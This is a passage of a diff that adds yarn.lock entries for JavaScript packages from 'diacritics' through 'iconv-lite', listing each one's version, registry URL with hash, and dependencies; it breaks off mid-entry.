+diacritics@^1.3.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/diacritics/-/diacritics-1.3.0.tgz#3efa87323ebb863e6696cebb0082d48ff3d6f7a1" + +diffie-hellman@^5.0.0: + version "5.0.3" + resolved "https://registry.yarnpkg.com/diffie-hellman/-/diffie-hellman-5.0.3.tgz#40e8ee98f55a2149607146921c63e1ae5f3d2875" + dependencies: + bn.js "^4.1.0" + miller-rabin "^4.0.0" + randombytes "^2.0.0" + +dir-glob@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/dir-glob/-/dir-glob-2.0.0.tgz#0b205d2b6aef98238ca286598a8204d29d0a0034" + dependencies: + arrify "^1.0.1" + path-type "^3.0.0" + +docsearch.js@^2.5.2: + version "2.5.2" + resolved "https://registry.yarnpkg.com/docsearch.js/-/docsearch.js-2.5.2.tgz#1a3521c92e5f252cc522c57357ef1c47b945b381" + dependencies: + algoliasearch "^3.24.5" + autocomplete.js "^0.29.0" + hogan.js "^3.0.2" + to-factory "^1.0.0" + +dom-converter@~0.1: + version "0.1.4" + resolved "https://registry.yarnpkg.com/dom-converter/-/dom-converter-0.1.4.tgz#a45ef5727b890c9bffe6d7c876e7b19cb0e17f3b" + dependencies: + utila "~0.3" + +dom-serializer@0: + version "0.1.0" + resolved "https://registry.yarnpkg.com/dom-serializer/-/dom-serializer-0.1.0.tgz#073c697546ce0780ce23be4a28e293e40bc30c82" + dependencies: + domelementtype "~1.1.1" + entities "~1.1.1" + +dom-walk@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/dom-walk/-/dom-walk-0.1.1.tgz#672226dc74c8f799ad35307df936aba11acd6018" + +domain-browser@^1.1.1: + version "1.2.0" + resolved "https://registry.yarnpkg.com/domain-browser/-/domain-browser-1.2.0.tgz#3d31f50191a6749dd1375a7f522e823d42e54eda" + +domelementtype@1: + version "1.3.0" + resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.3.0.tgz#b17aed82e8ab59e52dd9c19b1756e0fc187204c2" + +domelementtype@~1.1.1: + version "1.1.3" + resolved "https://registry.yarnpkg.com/domelementtype/-/domelementtype-1.1.3.tgz#bd28773e2642881aec51544924299c5cd822185b" + +domhandler@2.1: + version "2.1.0" + resolved "https://registry.yarnpkg.com/domhandler/-/domhandler-2.1.0.tgz#d2646f5e57f6c3bab11cf6cb05d3c0acf7412594" + dependencies: + domelementtype "1" + +domutils@1.1: + version "1.1.6" + resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.1.6.tgz#bddc3de099b9a2efacc51c623f28f416ecc57485" + dependencies: + domelementtype "1" + +domutils@1.5.1: + version "1.5.1" + resolved "https://registry.yarnpkg.com/domutils/-/domutils-1.5.1.tgz#dcd8488a26f563d61079e48c9f7b7e32373682cf" + dependencies: + dom-serializer "0" + domelementtype "1" + +dot-prop@^4.1.0, dot-prop@^4.1.1: + version "4.2.0" + resolved "https://registry.yarnpkg.com/dot-prop/-/dot-prop-4.2.0.tgz#1f19e0c2e1aa0e32797c49799f2837ac6af69c57" + dependencies: + is-obj "^1.0.0" + +duplexer3@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/duplexer3/-/duplexer3-0.1.4.tgz#ee01dd1cac0ed3cbc7fdbea37dc0a8f1ce002ce2" + +duplexify@^3.4.2, duplexify@^3.6.0: + version "3.6.0" + resolved "https://registry.yarnpkg.com/duplexify/-/duplexify-3.6.0.tgz#592903f5d80b38d037220541264d69a198fb3410" + dependencies: + end-of-stream "^1.0.0" + inherits "^2.0.1" + readable-stream "^2.0.0" + stream-shift "^1.0.0" + +ee-first@1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/ee-first/-/ee-first-1.1.1.tgz#590c61156b0ae2f4f0255732a158b266bc56b21d" + +electron-to-chromium@^1.2.7, electron-to-chromium@^1.3.47: + version "1.3.50" + resolved "https://registry.yarnpkg.com/electron-to-chromium/-/electron-to-chromium-1.3.50.tgz#7438b76f92b41b919f3fbdd350fbd0757dacddf7" + +elliptic@^6.0.0: + version "6.4.0" + resolved "https://registry.yarnpkg.com/elliptic/-/elliptic-6.4.0.tgz#cac9af8762c85836187003c8dfe193e5e2eae5df" + dependencies: + bn.js "^4.4.0" + brorand "^1.0.1" + hash.js "^1.0.0" + hmac-drbg "^1.0.0" + inherits "^2.0.1" + minimalistic-assert "^1.0.0" + minimalistic-crypto-utils "^1.0.0" + +emojis-list@^2.0.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/emojis-list/-/emojis-list-2.1.0.tgz#4daa4d9db00f9819880c79fa457ae5b09a1fd389" + +end-of-stream@^1.0.0, end-of-stream@^1.1.0: + version "1.4.1" + resolved "https://registry.yarnpkg.com/end-of-stream/-/end-of-stream-1.4.1.tgz#ed29634d19baba463b6ce6b80a37213eab71ec43" + dependencies: + once "^1.4.0" + +enhanced-resolve@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/enhanced-resolve/-/enhanced-resolve-4.0.0.tgz#e34a6eaa790f62fccd71d93959f56b2b432db10a" + dependencies: + graceful-fs "^4.1.2" + memory-fs "^0.4.0" + tapable "^1.0.0" + +entities@~1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/entities/-/entities-1.1.1.tgz#6e5c2d0a5621b5dadaecef80b90edfb5cd7772f0" + +envify@^4.0.0: + version "4.1.0" + resolved "https://registry.yarnpkg.com/envify/-/envify-4.1.0.tgz#f39ad3db9d6801b4e6b478b61028d3f0b6819f7e" + dependencies: + esprima "^4.0.0" + through "~2.3.4" + +errno@^0.1.3, errno@~0.1.7: + version "0.1.7" + resolved "https://registry.yarnpkg.com/errno/-/errno-0.1.7.tgz#4684d71779ad39af177e3f007996f7c67c852618" + dependencies: + prr "~1.0.1" + +error-ex@^1.2.0, error-ex@^1.3.1: + version "1.3.2" + resolved "https://registry.yarnpkg.com/error-ex/-/error-ex-1.3.2.tgz#b4ac40648107fdcdcfae242f428bea8a14d4f1bf" + dependencies: + is-arrayish "^0.2.1" + +error-inject@~1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/error-inject/-/error-inject-1.0.0.tgz#e2b3d91b54aed672f309d950d154850fa11d4f37" + +es-abstract@^1.5.1: + version "1.12.0" + resolved "https://registry.yarnpkg.com/es-abstract/-/es-abstract-1.12.0.tgz#9dbbdd27c6856f0001421ca18782d786bf8a6165" + dependencies: + es-to-primitive "^1.1.1" + function-bind "^1.1.1" + has "^1.0.1" + is-callable "^1.1.3" + is-regex "^1.0.4" + +es-to-primitive@^1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/es-to-primitive/-/es-to-primitive-1.1.1.tgz#45355248a88979034b6792e19bb81f2b7975dd0d" + dependencies: + is-callable "^1.1.1" + is-date-object "^1.0.1" + is-symbol "^1.0.1" + +es5-ext@^0.10.35, es5-ext@^0.10.9, es5-ext@~0.10.14: + version "0.10.45" + resolved "https://registry.yarnpkg.com/es5-ext/-/es5-ext-0.10.45.tgz#0bfdf7b473da5919d5adf3bd25ceb754fccc3653" + dependencies: + es6-iterator "~2.0.3" + es6-symbol "~3.1.1" + next-tick "1" + +es6-iterator@~2.0.3: + version "2.0.3" + resolved "https://registry.yarnpkg.com/es6-iterator/-/es6-iterator-2.0.3.tgz#a7de889141a05a94b0854403b2d0a0fbfa98f3b7" + dependencies: + d "1" + es5-ext "^0.10.35" + es6-symbol "^3.1.1" + +es6-promise@^4.1.0: + version "4.2.4" + resolved "https://registry.yarnpkg.com/es6-promise/-/es6-promise-4.2.4.tgz#dc4221c2b16518760bd8c39a52d8f356fc00ed29" + +es6-symbol@^3.1.1, es6-symbol@~3.1.1: + version "3.1.1" + resolved "https://registry.yarnpkg.com/es6-symbol/-/es6-symbol-3.1.1.tgz#bf00ef4fdab6ba1b46ecb7b629b4c7ed5715cc77" + dependencies: + d "1" + es5-ext "~0.10.14" + +escape-html@^1.0.3, escape-html@~1.0.1: + version "1.0.3" + resolved "https://registry.yarnpkg.com/escape-html/-/escape-html-1.0.3.tgz#0258eae4d3d0c0974de1c169188ef0051d1d1988" + +escape-string-regexp@^1.0.2, escape-string-regexp@^1.0.5: + version "1.0.5" + resolved "https://registry.yarnpkg.com/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz#1b61c0562190a8dff6ae3bb2cf0200ca130b86d4" + +eslint-scope@^3.7.1: + version "3.7.1" + resolved "https://registry.yarnpkg.com/eslint-scope/-/eslint-scope-3.7.1.tgz#3d63c3edfda02e06e01a452ad88caacc7cdcb6e8" + dependencies: + esrecurse "^4.1.0" + estraverse "^4.1.1" + +esprima@^2.6.0: + version "2.7.3" + resolved "https://registry.yarnpkg.com/esprima/-/esprima-2.7.3.tgz#96e3b70d5779f6ad49cd032673d1c312767ba581" + +esprima@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/esprima/-/esprima-4.0.0.tgz#4499eddcd1110e0b218bacf2fa7f7f59f55ca804" + +esrecurse@^4.1.0: + version "4.2.1" + resolved "https://registry.yarnpkg.com/esrecurse/-/esrecurse-4.2.1.tgz#007a3b9fdbc2b3bb87e4879ea19c92fdbd3942cf" + dependencies: + estraverse "^4.1.0" + +estraverse@^4.1.0, estraverse@^4.1.1: + version "4.2.0" + resolved "https://registry.yarnpkg.com/estraverse/-/estraverse-4.2.0.tgz#0dee3fed31fcd469618ce7342099fc1afa0bdb13" + +esutils@^2.0.2: + version "2.0.2" + resolved "https://registry.yarnpkg.com/esutils/-/esutils-2.0.2.tgz#0abf4f1caa5bcb1f7a9d8acc6dea4faaa04bac9b" + +events@^1.0.0, events@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/events/-/events-1.1.1.tgz#9ebdb7635ad099c70dcc4c2a1f5004288e8bd924" + +evp_bytestokey@^1.0.0, evp_bytestokey@^1.0.3: + version "1.0.3" + resolved "https://registry.yarnpkg.com/evp_bytestokey/-/evp_bytestokey-1.0.3.tgz#7fcbdb198dc71959432efe13842684e0525acb02" + dependencies: + md5.js "^1.3.4" + safe-buffer "^5.1.1" + +execa@^0.7.0: + version "0.7.0" + resolved "https://registry.yarnpkg.com/execa/-/execa-0.7.0.tgz#944becd34cc41ee32a63a9faf27ad5a65fc59777" + dependencies: + cross-spawn "^5.0.1" + get-stream "^3.0.0" + is-stream "^1.1.0" + npm-run-path "^2.0.0" + p-finally "^1.0.0" + signal-exit "^3.0.0" + strip-eof "^1.0.0" + +execa@^0.8.0: + version "0.8.0" + resolved "https://registry.yarnpkg.com/execa/-/execa-0.8.0.tgz#d8d76bbc1b55217ed190fd6dd49d3c774ecfc8da" + dependencies: + cross-spawn "^5.0.1" + get-stream "^3.0.0" + is-stream "^1.1.0" + npm-run-path "^2.0.0" + p-finally "^1.0.0" + signal-exit "^3.0.0" + strip-eof "^1.0.0" + +expand-brackets@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-0.1.5.tgz#df07284e342a807cd733ac5af72411e581d1177b" + dependencies: + is-posix-bracket "^0.1.0" + +expand-brackets@^2.1.4: + version "2.1.4" + resolved "https://registry.yarnpkg.com/expand-brackets/-/expand-brackets-2.1.4.tgz#b77735e315ce30f6b6eff0f83b04151a22449622" + dependencies: + debug "^2.3.3" + define-property "^0.2.5" + extend-shallow "^2.0.1" + posix-character-classes "^0.1.0" + regex-not "^1.0.0" + snapdragon "^0.8.1" + to-regex "^3.0.1" + +expand-range@^1.8.1: + version "1.8.2" + resolved "https://registry.yarnpkg.com/expand-range/-/expand-range-1.8.2.tgz#a299effd335fe2721ebae8e257ec79644fc85337" + dependencies: + fill-range "^2.1.0" + +extend-shallow@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-2.0.1.tgz#51af7d614ad9a9f610ea1bafbb989d6b1c56890f" + dependencies: + is-extendable "^0.1.0" + +extend-shallow@^3.0.0, extend-shallow@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/extend-shallow/-/extend-shallow-3.0.2.tgz#26a71aaf073b39fb2127172746131c2704028db8" + dependencies: + assign-symbols "^1.0.0" + is-extendable "^1.0.1" + +extglob@^0.3.1: + version "0.3.2" + resolved "https://registry.yarnpkg.com/extglob/-/extglob-0.3.2.tgz#2e18ff3d2f49ab2765cec9023f011daa8d8349a1" + dependencies: + is-extglob "^1.0.0" + +extglob@^2.0.4: + version "2.0.4" + resolved "https://registry.yarnpkg.com/extglob/-/extglob-2.0.4.tgz#ad00fe4dc612a9232e8718711dc5cb5ab0285543" + dependencies: + array-unique "^0.3.2" + define-property "^1.0.0" + expand-brackets "^2.1.4" + extend-shallow "^2.0.1" + fragment-cache "^0.2.1" + regex-not "^1.0.0" + snapdragon "^0.8.1" + to-regex "^3.0.1" + +fast-deep-equal@^2.0.1: + version "2.0.1" + resolved "https://registry.yarnpkg.com/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz#7b05218ddf9667bf7f370bf7fdb2cb15fdd0aa49" + +fast-glob@^2.0.2: + version "2.2.2" + resolved "https://registry.yarnpkg.com/fast-glob/-/fast-glob-2.2.2.tgz#71723338ac9b4e0e2fff1d6748a2a13d5ed352bf" + dependencies: + "@mrmlnc/readdir-enhanced" "^2.2.1" + "@nodelib/fs.stat" "^1.0.1" + glob-parent "^3.1.0" + is-glob "^4.0.0" + merge2 "^1.2.1" + micromatch "^3.1.10" + +fast-json-stable-stringify@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/fast-json-stable-stringify/-/fast-json-stable-stringify-2.0.0.tgz#d5142c0caee6b1189f87d3a76111064f86c8bbf2" + +fastparse@^1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/fastparse/-/fastparse-1.1.1.tgz#d1e2643b38a94d7583b479060e6c4affc94071f8" + +figures@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/figures/-/figures-2.0.0.tgz#3ab1a2d2a62c8bfb431a0c94cb797a2fce27c962" + dependencies: + escape-string-regexp "^1.0.5" + +file-loader@^1.1.11: + version "1.1.11" + resolved "https://registry.yarnpkg.com/file-loader/-/file-loader-1.1.11.tgz#6fe886449b0f2a936e43cabaac0cdbfb369506f8" + dependencies: + loader-utils "^1.0.2" + schema-utils "^0.4.5" + +filename-regex@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/filename-regex/-/filename-regex-2.0.1.tgz#c1c4b9bee3e09725ddb106b75c1e301fe2f18b26" + +fill-range@^2.1.0: + version "2.2.4" + resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-2.2.4.tgz#eb1e773abb056dcd8df2bfdf6af59b8b3a936565" + dependencies: + is-number "^2.1.0" + isobject "^2.0.0" + randomatic "^3.0.0" + repeat-element "^1.1.2" + repeat-string "^1.5.2" + +fill-range@^4.0.0: + version "4.0.0" + resolved "https://registry.yarnpkg.com/fill-range/-/fill-range-4.0.0.tgz#d544811d428f98eb06a63dc402d2403c328c38f7" + dependencies: + extend-shallow "^2.0.1" + is-number "^3.0.0" + repeat-string "^1.6.1" + to-regex-range "^2.1.0" + +find-cache-dir@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/find-cache-dir/-/find-cache-dir-1.0.0.tgz#9288e3e9e3cc3748717d39eade17cf71fc30ee6f" + dependencies: + commondir "^1.0.1" + make-dir "^1.0.0" + pkg-dir "^2.0.0" + +find-up@^2.0.0, find-up@^2.1.0: + version "2.1.0" + resolved "https://registry.yarnpkg.com/find-up/-/find-up-2.1.0.tgz#45d1b7e506c717ddd482775a2b77920a3c0c57a7" + dependencies: + locate-path "^2.0.0" + +flatten@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/flatten/-/flatten-1.0.2.tgz#dae46a9d78fbe25292258cc1e780a41d95c03782" + +flush-write-stream@^1.0.0: + version "1.0.3" + resolved "https://registry.yarnpkg.com/flush-write-stream/-/flush-write-stream-1.0.3.tgz#c5d586ef38af6097650b49bc41b55fabb19f35bd" + dependencies: + inherits "^2.0.1" + readable-stream "^2.0.4" + +for-in@^1.0.1, for-in@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/for-in/-/for-in-1.0.2.tgz#81068d295a8142ec0ac726c6e2200c30fb6d5e80" + +for-own@^0.1.4: + version "0.1.5" + resolved "https://registry.yarnpkg.com/for-own/-/for-own-0.1.5.tgz#5265c681a4f294dabbf17c9509b6763aa84510ce" + dependencies: + for-in "^1.0.1" + +foreach@^2.0.5: + version "2.0.5" + resolved "https://registry.yarnpkg.com/foreach/-/foreach-2.0.5.tgz#0bee005018aeb260d0a3af3ae658dd0136ec1b99" + +fragment-cache@^0.2.1: + version "0.2.1" + resolved "https://registry.yarnpkg.com/fragment-cache/-/fragment-cache-0.2.1.tgz#4290fad27f13e89be7f33799c6bc5a0abfff0d19" + dependencies: + map-cache "^0.2.2" + +fresh@^0.5.2: + version "0.5.2" + resolved "https://registry.yarnpkg.com/fresh/-/fresh-0.5.2.tgz#3d8cadd90d976569fa835ab1f8e4b23a105605a7" + +from2@^2.1.0: + version "2.3.0" + resolved "https://registry.yarnpkg.com/from2/-/from2-2.3.0.tgz#8bfb5502bde4a4d36cfdeea007fcca21d7e382af" + dependencies: + inherits "^2.0.1" + readable-stream "^2.0.0" + +fs-extra@^4.0.2: + version "4.0.3" + resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-4.0.3.tgz#0d852122e5bc5beb453fb028e9c0c9bf36340c94" + dependencies: + graceful-fs "^4.1.2" + jsonfile "^4.0.0" + universalify "^0.1.0" + +fs-extra@^5.0.0: + version "5.0.0" + resolved "https://registry.yarnpkg.com/fs-extra/-/fs-extra-5.0.0.tgz#414d0110cdd06705734d055652c5411260c31abd" + dependencies: + graceful-fs "^4.1.2" + jsonfile "^4.0.0" + universalify "^0.1.0" + +fs-minipass@^1.2.5: + version "1.2.5" + resolved "https://registry.yarnpkg.com/fs-minipass/-/fs-minipass-1.2.5.tgz#06c277218454ec288df77ada54a03b8702aacb9d" + dependencies: + minipass "^2.2.1" + +fs-write-stream-atomic@^1.0.8: + version "1.0.10" + resolved "https://registry.yarnpkg.com/fs-write-stream-atomic/-/fs-write-stream-atomic-1.0.10.tgz#b47df53493ef911df75731e70a9ded0189db40c9" + dependencies: + graceful-fs "^4.1.2" + iferr "^0.1.5" + imurmurhash "^0.1.4" + readable-stream "1 || 2" + +fs.realpath@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/fs.realpath/-/fs.realpath-1.0.0.tgz#1504ad2523158caa40db4a2787cb01411994ea4f" + +fsevents@^1.2.2: + version "1.2.4" + resolved "https://registry.yarnpkg.com/fsevents/-/fsevents-1.2.4.tgz#f41dcb1af2582af3692da36fc55cbd8e1041c426" + dependencies: + nan "^2.9.2" + node-pre-gyp "^0.10.0" + +function-bind@^1.1.1: + version "1.1.1" + resolved "https://registry.yarnpkg.com/function-bind/-/function-bind-1.1.1.tgz#a56899d3ea3c9bab874bb9773b7c5ede92f4895d" + +gauge@~2.7.3: + version "2.7.4" + resolved "https://registry.yarnpkg.com/gauge/-/gauge-2.7.4.tgz#2c03405c7538c39d7eb37b317022e325fb018bf7" + dependencies: + aproba "^1.0.3" + console-control-strings "^1.0.0" + has-unicode "^2.0.0" + object-assign "^4.1.0" + signal-exit "^3.0.0" + string-width "^1.0.1" + strip-ansi "^3.0.1" + wide-align "^1.1.0" + +get-port@^3.2.0: + version "3.2.0" + resolved "https://registry.yarnpkg.com/get-port/-/get-port-3.2.0.tgz#dd7ce7de187c06c8bf353796ac71e099f0980ebc" + +get-stream@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/get-stream/-/get-stream-3.0.0.tgz#8e943d1358dc37555054ecbe2edb05aa174ede14" + +get-value@^2.0.3, get-value@^2.0.6: + version "2.0.6" + resolved "https://registry.yarnpkg.com/get-value/-/get-value-2.0.6.tgz#dc15ca1c672387ca76bd37ac0a395ba2042a2c28" + +glob-base@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/glob-base/-/glob-base-0.3.0.tgz#dbb164f6221b1c0b1ccf82aea328b497df0ea3c4" + dependencies: + glob-parent "^2.0.0" + is-glob "^2.0.0" + +glob-parent@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/glob-parent/-/glob-parent-2.0.0.tgz#81383d72db054fcccf5336daa902f182f6edbb28" + dependencies: + is-glob "^2.0.0" + +glob-parent@^3.1.0: + version "3.1.0" + resolved "https://registry.yarnpkg.com/glob-parent/-/glob-parent-3.1.0.tgz#9e6af6299d8d3bd2bd40430832bd113df906c5ae" + dependencies: + is-glob "^3.1.0" + path-dirname "^1.0.0" + +glob-to-regexp@^0.3.0: + version "0.3.0" + resolved "https://registry.yarnpkg.com/glob-to-regexp/-/glob-to-regexp-0.3.0.tgz#8c5a1494d2066c570cc3bfe4496175acc4d502ab" + +glob@7.0.x: + version "7.0.6" + resolved "https://registry.yarnpkg.com/glob/-/glob-7.0.6.tgz#211bafaf49e525b8cd93260d14ab136152b3f57a" + dependencies: + fs.realpath "^1.0.0" + inflight "^1.0.4" + inherits "2" + minimatch "^3.0.2" + once "^1.3.0" + path-is-absolute "^1.0.0" + +glob@^7.0.5, glob@^7.1.2: + version "7.1.2" + resolved "https://registry.yarnpkg.com/glob/-/glob-7.1.2.tgz#c19c9df9a028702d678612384a6552404c636d15" + dependencies: + fs.realpath "^1.0.0" + inflight "^1.0.4" + inherits "2" + minimatch "^3.0.4" + once "^1.3.0" + path-is-absolute "^1.0.0" + +global-dirs@^0.1.0: + version "0.1.1" + resolved "https://registry.yarnpkg.com/global-dirs/-/global-dirs-0.1.1.tgz#b319c0dd4607f353f3be9cca4c72fc148c49f445" + dependencies: + ini "^1.3.4" + +global@^4.3.2: + version "4.3.2" + resolved "https://registry.yarnpkg.com/global/-/global-4.3.2.tgz#e76989268a6c74c38908b1305b10fc0e394e9d0f" + dependencies: + min-document "^2.19.0" + process "~0.5.1" + +globals@^11.1.0: + version "11.7.0" + resolved "https://registry.yarnpkg.com/globals/-/globals-11.7.0.tgz#a583faa43055b1aca771914bf68258e2fc125673" + +globby@^7.1.1: + version "7.1.1" + resolved "https://registry.yarnpkg.com/globby/-/globby-7.1.1.tgz#fb2ccff9401f8600945dfada97440cca972b8680" + dependencies: + array-union "^1.0.1" + dir-glob "^2.0.0" + glob "^7.1.2" + ignore "^3.3.5" + pify "^3.0.0" + slash "^1.0.0" + +globby@^8.0.1: + version "8.0.1" + resolved "https://registry.yarnpkg.com/globby/-/globby-8.0.1.tgz#b5ad48b8aa80b35b814fc1281ecc851f1d2b5b50" + dependencies: + array-union "^1.0.1" + dir-glob "^2.0.0" + fast-glob "^2.0.2" + glob "^7.1.2" + ignore "^3.3.5" + pify "^3.0.0" + slash "^1.0.0" + +good-listener@^1.2.2: + version "1.2.2" + resolved "https://registry.yarnpkg.com/good-listener/-/good-listener-1.2.2.tgz#d53b30cdf9313dffb7dc9a0d477096aa6d145c50" + dependencies: + delegate "^3.1.2" + +got@^6.7.1: + version "6.7.1" + resolved "https://registry.yarnpkg.com/got/-/got-6.7.1.tgz#240cd05785a9a18e561dc1b44b41c763ef1e8db0" + dependencies: + create-error-class "^3.0.0" + duplexer3 "^0.1.4" + get-stream "^3.0.0" + is-redirect "^1.0.0" + is-retry-allowed "^1.0.0" + is-stream "^1.0.0" + lowercase-keys "^1.0.0" + safe-buffer "^5.0.1" + timed-out "^4.0.0" + unzip-response "^2.0.1" + url-parse-lax "^1.0.0" + +graceful-fs@^4.1.11, graceful-fs@^4.1.2, graceful-fs@^4.1.6: + version "4.1.11" + resolved "https://registry.yarnpkg.com/graceful-fs/-/graceful-fs-4.1.11.tgz#0e8bdfe4d1ddb8854d64e04ea7c00e2a026e5658" + +gray-matter@^4.0.1: + version "4.0.1" + resolved "https://registry.yarnpkg.com/gray-matter/-/gray-matter-4.0.1.tgz#375263c194f0d9755578c277e41b1c1dfdf22c7d" + dependencies: + js-yaml "^3.11.0" + kind-of "^6.0.2" + section-matter "^1.0.0" + strip-bom-string "^1.0.0" + +has-ansi@^2.0.0: + version "2.0.0" + resolved "https://registry.yarnpkg.com/has-ansi/-/has-ansi-2.0.0.tgz#34f5049ce1ecdf2b0649af3ef24e45ed35416d91" + dependencies: + ansi-regex "^2.0.0" + +has-flag@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/has-flag/-/has-flag-1.0.0.tgz#9d9e793165ce017a00f00418c43f942a7b1d11fa" + +has-flag@^3.0.0: + version "3.0.0" + resolved "https://registry.yarnpkg.com/has-flag/-/has-flag-3.0.0.tgz#b5d454dc2199ae225699f3467e5a07f3b955bafd" + +has-symbols@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/has-symbols/-/has-symbols-1.0.0.tgz#ba1a8f1af2a0fc39650f5c850367704122063b44" + +has-unicode@^2.0.0: + version "2.0.1" + resolved "https://registry.yarnpkg.com/has-unicode/-/has-unicode-2.0.1.tgz#e0e6fe6a28cf51138855e086d1691e771de2a8b9" + +has-value@^0.3.1: + version "0.3.1" + resolved "https://registry.yarnpkg.com/has-value/-/has-value-0.3.1.tgz#7b1f58bada62ca827ec0a2078025654845995e1f" + dependencies: + get-value "^2.0.3" + has-values "^0.1.4" + isobject "^2.0.0" + +has-value@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/has-value/-/has-value-1.0.0.tgz#18b281da585b1c5c51def24c930ed29a0be6b177" + dependencies: + get-value "^2.0.6" + has-values "^1.0.0" + isobject "^3.0.0" + +has-values@^0.1.4: + version "0.1.4" + resolved "https://registry.yarnpkg.com/has-values/-/has-values-0.1.4.tgz#6d61de95d91dfca9b9a02089ad384bff8f62b771" + +has-values@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/has-values/-/has-values-1.0.0.tgz#95b0b63fec2146619a6fe57fe75628d5a39efe4f" + dependencies: + is-number "^3.0.0" + kind-of "^4.0.0" + +has@^1.0.1: + version "1.0.3" + resolved "https://registry.yarnpkg.com/has/-/has-1.0.3.tgz#722d7cbfc1f6aa8241f16dd814e011e1f41e8796" + dependencies: + function-bind "^1.1.1" + +hash-base@^3.0.0: + version "3.0.4" + resolved "https://registry.yarnpkg.com/hash-base/-/hash-base-3.0.4.tgz#5fc8686847ecd73499403319a6b0a3f3f6ae4918" + dependencies: + inherits "^2.0.1" + safe-buffer "^5.0.1" + +hash-sum@^1.0.2: + version "1.0.2" + resolved "https://registry.yarnpkg.com/hash-sum/-/hash-sum-1.0.2.tgz#33b40777754c6432573c120cc3808bbd10d47f04" + +hash.js@^1.0.0, hash.js@^1.0.3: + version "1.1.4" + resolved "https://registry.yarnpkg.com/hash.js/-/hash.js-1.1.4.tgz#8b50e1f35d51bd01e5ed9ece4dbe3549ccfa0a3c" + dependencies: + inherits "^2.0.3" + minimalistic-assert "^1.0.0" + +he@1.1.x, he@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/he/-/he-1.1.1.tgz#93410fd21b009735151f8868c2f271f3427e23fd" + +hmac-drbg@^1.0.0: + version "1.0.1" + resolved "https://registry.yarnpkg.com/hmac-drbg/-/hmac-drbg-1.0.1.tgz#d2745701025a6c775a6c545793ed502fc0c649a1" + dependencies: + hash.js "^1.0.3" + minimalistic-assert "^1.0.0" + minimalistic-crypto-utils "^1.0.1" + +hoek@4.x.x: + version "4.2.1" + resolved "https://registry.yarnpkg.com/hoek/-/hoek-4.2.1.tgz#9634502aa12c445dd5a7c5734b572bb8738aacbb" + +hogan.js@^3.0.2: + version "3.0.2" + resolved "https://registry.yarnpkg.com/hogan.js/-/hogan.js-3.0.2.tgz#4cd9e1abd4294146e7679e41d7898732b02c7bfd" + dependencies: + mkdirp "0.3.0" + nopt "1.0.10" + +hosted-git-info@^2.1.4: + version "2.6.0" + resolved "https://registry.yarnpkg.com/hosted-git-info/-/hosted-git-info-2.6.0.tgz#23235b29ab230c576aab0d4f13fc046b0b038222" + +html-comment-regex@^1.1.0: + version "1.1.1" + resolved "https://registry.yarnpkg.com/html-comment-regex/-/html-comment-regex-1.1.1.tgz#668b93776eaae55ebde8f3ad464b307a4963625e" + +html-minifier@^3.2.3: + version "3.5.16" + resolved "https://registry.yarnpkg.com/html-minifier/-/html-minifier-3.5.16.tgz#39f5aabaf78bdfc057fe67334226efd7f3851175" + dependencies: + camel-case "3.0.x" + clean-css "4.1.x" + commander "2.15.x" + he "1.1.x" + param-case "2.1.x" + relateurl "0.2.x" + uglify-js "3.3.x" + +htmlparser2@~3.3.0: + version "3.3.0" + resolved "https://registry.yarnpkg.com/htmlparser2/-/htmlparser2-3.3.0.tgz#cc70d05a59f6542e43f0e685c982e14c924a9efe" + dependencies: + domelementtype "1" + domhandler "2.1" + domutils "1.1" + readable-stream "1.0" + +http-assert@^1.1.0: + version "1.3.0" + resolved "https://registry.yarnpkg.com/http-assert/-/http-assert-1.3.0.tgz#a31a5cf88c873ecbb5796907d4d6f132e8c01e4a" + dependencies: + deep-equal "~1.0.1" + http-errors "~1.6.1" + +http-errors@^1.2.8, http-errors@^1.6.1, http-errors@~1.6.1, http-errors@~1.6.2: + version "1.6.3" + resolved "https://registry.yarnpkg.com/http-errors/-/http-errors-1.6.3.tgz#8b55680bb4be283a0b5bf4ea2e38580be1d9320d" + dependencies: + depd "~1.1.2" + inherits "2.0.3" + setprototypeof "1.1.0" + statuses ">= 1.4.0 < 2" + +https-browserify@^1.0.0: + version "1.0.0" + resolved "https://registry.yarnpkg.com/https-browserify/-/https-browserify-1.0.0.tgz#ec06c10e0a34c0f2faf199f7fd7fc78fffd03c73" + +iconv-lite@^0.4.4: + version "0.4.23" + resolved 